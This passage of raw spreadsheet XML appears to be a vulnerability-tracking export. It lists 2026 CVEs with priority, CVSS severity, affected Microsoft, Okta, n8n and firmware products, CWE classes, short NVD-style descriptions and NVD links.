DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T786" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77890</t></is></c></row><row r="787"><c r="A787" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B787" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C787" s="5" t="inlineStr"><is><t>CVE-2026-77893</t></is></c><c r="D787" s="5" t="n"><v>7.5</v></c><c r="E787" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F787" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G787" s="5" t="inlineStr" /><c r="H787" s="5" t="n"><v>0.008</v></c><c r="I787" s="5" t="inlineStr" /><c r="J787" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K787" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L787" s="5" t="inlineStr" /><c r="M787" s="5" t="inlineStr" /><c r="N787" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O787" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P787" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q787" s="5" t="inlineStr" /><c r="R787" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S787" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T787" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77893</t></is></c></row><row r="788"><c r="A788" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B788" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C788" s="5" t="inlineStr"><is><t>CVE-2026-77895</t></is></c><c r="D788" s="5" t="n"><v>7.5</v></c><c r="E788" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F788" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G788" s="5" t="inlineStr" /><c r="H788" s="5" t="n"><v>0.011</v></c><c r="I788" s="5" t="inlineStr" /><c r="J788" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K788" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L788" s="5" t="inlineStr" /><c r="M788" s="5" t="inlineStr" /><c r="N788" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O788" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P788" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q788" s="5" t="inlineStr" /><c r="R788" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S788" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T788" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77895</t></is></c></row><row r="789"><c r="A789" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B789" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C789" s="5" t="inlineStr"><is><t>CVE-2026-77898</t></is></c><c r="D789" s="5" t="n"><v>7.5</v></c><c r="E789" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F789" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G789" s="5" t="inlineStr" /><c r="H789" s="5" t="n"><v>0.005</v></c><c r="I789" s="5" t="inlineStr" /><c r="J789" s="5" t="inlineStr" /><c r="K789" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L789" s="5" t="inlineStr" /><c r="M789" s="5" t="inlineStr" /><c r="N789" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O789" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P789" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q789" s="5" t="inlineStr" /><c r="R789" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S789" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T789" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77898</t></is></c></row><row r="790"><c r="A790" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B790" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C790" s="5" t="inlineStr"><is><t>CVE-2026-78523</t></is></c><c r="D790" s="5" t="n"><v>7.5</v></c><c r="E790" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G790" s="5" t="inlineStr" /><c r="H790" s="5" t="n"><v>0.01</v></c><c r="I790" s="5" t="inlineStr" /><c r="J790" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K790" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L790" s="5" t="inlineStr" /><c r="M790" s="5" t="inlineStr" /><c r="N790" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O790" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P790" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q790" s="5" t="inlineStr" /><c r="R790" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S790" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T790" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78523</t></is></c></row><row r="791"><c r="A791" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B791" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C791" s="5" t="inlineStr"><is><t>CVE-2026-78574</t></is></c><c r="D791" s="5" t="n"><v>7.5</v></c><c r="E791" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F791" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G791" s="5" t="inlineStr" /><c r="H791" s="5" t="n"><v>0.001</v></c><c r="I791" s="5" t="inlineStr" /><c r="J791" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K791" s="5" t="inlineStr" /><c r="L791" s="5" t="inlineStr" /><c r="M791" s="5" t="inlineStr" /><c r="N791" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O791" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P791" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q791" s="5" t="inlineStr" /><c r="R791" s="5" t="inlineStr"><is><t>CWE-426</t></is></c><c r="S791" s="5" t="inlineStr"><is><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is></c><c r="T791" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78574</t></is></c></row><row r="792"><c r="A792" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B792" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C792" s="5" t="inlineStr"><is><t>CVE-2026-78837</t></is></c><c r="D792" s="5" t="n"><v>7.5</v></c><c r="E792" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F792" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G792" s="5" t="inlineStr" /><c r="H792" s="5" t="n"><v>0.003</v></c><c r="I792" s="5" t="inlineStr" /><c r="J792" s="5" t="inlineStr" /><c r="K792" s="5" t="inlineStr" /><c r="L792" s="5" t="inlineStr" /><c r="M792" s="5" t="inlineStr" /><c r="N792" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O792" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P792" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q792" s="5" t="inlineStr" /><c r="R792" s="5" t="inlineStr"><is><t>CWE-89</t></is></c><c r="S792" s="5" t="inlineStr"><is><t>A SQL injection vulnerability in the ap_form_{id} parameter in AppNitro MachForm v30 allows attackers to access sensitive database information via a crafted SQL statement.</t></is></c><c r="T792" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78837</t></is></c></row><row r="793"><c r="A793" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B793" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C793" s="5" t="inlineStr"><is><t>CVE-2026-79377</t></is></c><c r="D793" s="5" t="n"><v>7.5</v></c><c r="E793" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F793" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G793" s="5" t="inlineStr" /><c r="H793" s="5" t="n"><v>0.004</v></c><c r="I793" s="5" t="inlineStr" /><c r="J793" s="5" t="inlineStr" /><c r="K793" s="5" t="inlineStr" /><c r="L793" s="5" t="inlineStr" /><c r="M793" s="5" t="inlineStr" /><c r="N793" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O793" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P793" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q793" s="5" t="inlineStr" /><c r="R793" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S793" s="5" t="inlineStr"><is><t>A heap overflow in the a2dp_decoder_sbc.cpp component of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T793" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79377</t></is></c></row><row r="794"><c r="A794" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B794" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C794" s="5" t="inlineStr"><is><t>CVE-2026-79378</t></is></c><c r="D794" s="5" t="n"><v>7.5</v></c><c r="E794" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F794" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G794" s="5" t="inlineStr" /><c r="H794" s="5" t="n"><v>0.004</v></c><c r="I794" s="5" t="inlineStr" /><c r="J794" s="5" t="inlineStr" /><c r="K794" s="5" t="inlineStr" /><c r="L794" s="5" t="inlineStr" /><c r="M794" s="5" t="inlineStr" /><c r="N794" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O794" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P794" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q794" s="5" t="inlineStr" /><c r="R794" s="5" t="inlineStr"><is><t>CWE-400</t></is></c><c r="S794" s="5" t="inlineStr"><is><t>An issue in the btm_acl_handle() function of Bestechnic Co., Ltd BES2300 Bluetooth Audio SoC firmware v3.x and earlier allows attackers to cause a Denial of Service (DoS) via sending a crafted L2CAP packet.</t></is></c><c r="T794" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79378</t></is></c></row><row r="795"><c r="A795" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B795" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C795" s="5" t="inlineStr"><is><t>CVE-2026-79572</t></is></c><c r="D795" s="5" t="n"><v>7.5</v></c><c r="E795" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F795" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G795" s="5" t="inlineStr" /><c r="H795" s="5" t="n"><v>0.003</v></c><c r="I795" s="5" t="inlineStr" /><c r="J795" s="5" t="inlineStr" /><c r="K795" s="5" t="inlineStr" /><c r="L795" s="5" t="inlineStr" /><c r="M795" s="5" t="inlineStr" /><c r="N795" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O795" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P795" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q795" s="5" t="inlineStr" /><c r="R795" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S795" s="5" t="inlineStr"><is><t>An XXE (XML External Entity) vulnerability in the level-rule module of Distribution Management v1.0.0 allows attackers to read sensitive files, scan internal networks, or launch server attacks via supplying a crafted XML payload.</t></is></c><c r="T795" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79572</t></is></c></row><row r="796"><c r="A796" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B796" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C796" s="5" t="inlineStr"><is><t>CVE-2026-79575</t></is></c><c r="D796" s="5" t="n"><v>7.5</v></c><c r="E796" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F796" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G796" s="5" t="inlineStr" /><c r="H796" s="5" t="n"><v>0.002</v></c><c r="I796" s="5" t="inlineStr" /><c r="J796" s="5" t="inlineStr" /><c r="K796" s="5" t="inlineStr" /><c r="L796" s="5" t="inlineStr" /><c r="M796" s="5" t="inlineStr" /><c r="N796" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O796" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P796" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q796" s="5" t="inlineStr" /><c r="R796" s="5" t="inlineStr"><is><t>CWE-330</t></is></c><c r="S796" s="5" t="inlineStr"><is><t>The JWT signing secret in yfexam-exam v2.0 is derived from the username and the current month instead of a random server-side key, making the secret key easily obtainable via a bruteforce attack.</t></is></c><c r="T796" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79575</t></is></c></row><row r="797"><c r="A797" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B797" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C797" s="5" t="inlineStr"><is><t>CVE-2026-81355</t></is></c><c r="D797" s="5" t="n"><v>7.5</v></c><c r="E797" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F797" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G797" s="5" t="inlineStr" /><c r="H797" s="5" t="n"><v>0.002</v></c><c r="I797" s="5" t="inlineStr" /><c r="J797" s="5" t="inlineStr" /><c r="K797" s="5" t="inlineStr" /><c r="L797" s="5" t="inlineStr" /><c r="M797" s="5" t="inlineStr" /><c r="N797" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O797" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P797" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q797" s="5" t="inlineStr" /><c r="R797" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S797" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Virtual Hard Disk (VHD) Miniport Driver allows an authorized attacker to execute code locally.</t></is></c><c r="T797" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81355</t></is></c></row><row r="798"><c r="A798" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B798" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C798" s="5" t="inlineStr"><is><t>CVE-2026-81381</t></is></c><c r="D798" s="5" t="n"><v>7.5</v></c><c r="E798" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G798" s="5" t="inlineStr" /><c r="H798" s="5" t="n"><v>0.006</v></c><c r="I798" s="5" t="inlineStr" /><c r="J798" s="5" t="inlineStr" /><c r="K798" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L798" s="5" t="inlineStr" /><c r="M798" s="5" t="inlineStr" /><c r="N798" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O798" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P798" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q798" s="5" t="inlineStr" /><c r="R798" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S798" s="5" t="inlineStr"><is><t>Insufficiently protected credentials in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T798" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t></is></c></row><row r="799"><c r="A799" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B799" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C799" s="5" t="inlineStr"><is><t>CVE-2026-81790</t></is></c><c r="D799" s="5" t="n"><v>7.5</v></c><c r="E799" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F799" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G799" s="5" t="inlineStr" /><c r="H799" s="5" t="n"><v>0.003</v></c><c r="I799" s="5" t="inlineStr" /><c r="J799" s="5" t="inlineStr" /><c r="K799" s="5" t="inlineStr" /><c r="L799" s="5" t="inlineStr" /><c r="M799" s="5" t="inlineStr" /><c r="N799" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q799" s="5" t="inlineStr" /><c r="R799" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S799" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t></is></c><c r="T799" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t></is></c></row><row r="800"><c r="A800" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B800" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C800" s="5" t="inlineStr"><is><t>CVE-2026-83989</t></is></c><c r="D800" s="5" t="n"><v>7.5</v></c><c r="E800" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F800" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G800" s="5" t="inlineStr" /><c r="H800" s="5" t="n"><v>0.008999999999999999</v></c><c r="I800" s="5" t="inlineStr" /><c r="J800" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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0" s="5" t="inlineStr" /><c r="M800" s="5" t="inlineStr" /><c r="N800" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O800" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P800" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q800" s="5" t="inlineStr" /><c r="R800" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S800" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T800" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t></is></c></row><row r="801"><c r="A801" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B801" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C801" s="5" t="inlineStr"><is><t>CVE-2026-84001</t></is></c><c r="D801" s="5" t="n"><v>7.5</v></c><c r="E801" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F801" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G801" s="5" t="inlineStr" /><c r="H801" s="5" t="n"><v>0.006</v></c><c r="I801" s="5" t="inlineStr" /><c r="J801" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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1" s="5" t="inlineStr" /><c r="M801" s="5" t="inlineStr" /><c r="N801" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O801" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P801" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q801" s="5" t="inlineStr" /><c r="R801" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S801" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T801" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t></is></c></row><row r="802"><c r="A802" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B802" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C802" s="5" t="inlineStr"><is><t>CVE-2026-85400</t></is></c><c r="D802" s="5" t="n"><v>7.5</v></c><c r="E802" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F802" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G802" s="5" t="inlineStr" /><c r="H802" s="5" t="n"><v>0.004</v></c><c r="I802" s="5" t="inlineStr" /><c r="J802" s="5" t="inlineStr" /><c r="K802" s="5" t="inlineStr" /><c r="L802" s="5" t="inlineStr" /><c r="M802" s="5" t="inlineStr" /><c r="N802" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q802" s="5" t="inlineStr" /><c r="R802" s="5" t="inlineStr"><is><t>CWE-266, CWE-862</t></is></c><c r="S802" s="5" t="inlineStr"><is><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is></c><c r="T802" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t></is></c></row><row r="803"><c r="A803" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B803" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C803" s="5" t="inlineStr"><is><t>CVE-2026-86075</t></is></c><c r="D803" s="5" t="n"><v>7.5</v></c><c r="E803" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G803" s="5" t="inlineStr" /><c r="H803" s="5" t="n"><v>0.003</v></c><c r="I803" s="5" t="inlineStr" /><c r="J803" s="5" t="inlineStr" /><c r="K803" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L803" s="5" t="inlineStr" /><c r="M803" s="5" t="inlineStr" /><c r="N803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O803" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P803" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q803" s="5" t="inlineStr" /><c r="R803" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S803" s="5" t="inlineStr"><is><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is></c><c r="T803" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t></is></c></row><row r="804"><c r="A804" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B804" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C804" s="5" t="inlineStr"><is><t>CVE-2026-86711</t></is></c><c r="D804" s="5" t="n"><v>7.5</v></c><c r="E804" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F804" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G804" s="5" t="inlineStr" /><c r="H804" s="5" t="n"><v>0.001</v></c><c r="I804" s="5" t="inlineStr" /><c r="J804" s="5" t="inlineStr" /><c r="K804" s="5" t="inlineStr" /><c r="L804" s="5" t="inlineStr" /><c r="M804" s="5" t="inlineStr" /><c r="N804" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q804" s="5" t="inlineStr" /><c r="R804" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S804" s="5" t="inlineStr"><is><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is></c><c r="T804" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t></is></c></row><row r="805"><c r="A805" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B805" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C805" s="5" t="inlineStr"><is><t>CVE-2026-86721</t></is></c><c r="D805" s="5" t="n"><v>7.5</v></c><c r="E805" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G805" s="5" t="inlineStr" /><c r="H805" s="5" t="n"><v>0.003</v></c><c r="I805" s="5" t="inlineStr" /><c r="J805" s="5" t="inlineStr" /><c r="K805" s="5" t="inlineStr" /><c r="L805" s="5" t="inlineStr" /><c r="M805" s="5" t="inlineStr" /><c r="N805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q805" s="5" t="inlineStr" /><c r="R805" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S805" s="5" t="inlineStr"><is><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is></c><c r="T805" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t></is></c></row><row r="806"><c r="A806" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B806" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C806" s="5" t="inlineStr"><is><t>CVE-2026-86728</t></is></c><c r="D806" s="5" t="n"><v>7.5</v></c><c r="E806" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G806" s="5" t="inlineStr" /><c r="H806" s="5" t="n"><v>0.003</v></c><c r="I806" s="5" t="inlineStr" /><c r="J806" s="5" t="inlineStr" /><c r="K806" s="5" t="inlineStr" /><c r="L806" s="5" t="inlineStr" /><c r="M806" s="5" t="inlineStr" /><c r="N806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q806" s="5" t="inlineStr" /><c r="R806" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S806" s="5" t="inlineStr"><is><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is></c><c r="T806" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t></is></c></row><row r="807"><c r="A807" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B807" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C807" s="5" t="inlineStr"><is><t>CVE-2026-19651</t></is></c><c r="D807" s="5" t="n"><v>7.4</v></c><c r="E807" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F807" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G807" s="5" t="inlineStr" /><c r="H807" s="5" t="n"><v>0.003</v></c><c r="I807" s="5" t="inlineStr" /><c r="J807" s="5" t="inlineStr" /><c r="K807" s="5" t="inlineStr" /><c r="L807" s="5" t="inlineStr" /><c r="M807" s="5" t="inlineStr" /><c r="N807" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O807" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P807" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q807" s="5" t="inlineStr" /><c r="R807" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S807" s="5" t="inlineStr"><is><t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t></is></c><c r="T807" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t></is></c></row><row r="808"><c r="A808" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B808" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C808" s="5" t="inlineStr"><is><t>CVE-2026-69347</t></is></c><c r="D808" s="5" t="n"><v>7.4</v></c><c r="E808" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F808" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G808" s="5" t="inlineStr" /><c r="H808" s="5" t="n"><v>0.003</v></c><c r="I808" s="5" t="inlineStr" /><c r="J808" s="5" t="inlineStr" /><c r="K808" s="5" t="inlineStr" /><c r="L808" s="5" t="inlineStr" /><c r="M808" s="5" t="inlineStr" /><c r="N808" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O808" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P808" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q808" s="5" t="inlineStr" /><c r="R808" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S808" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T808" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t></is></c></row><row r="809"><c r="A809" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B809" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C809" 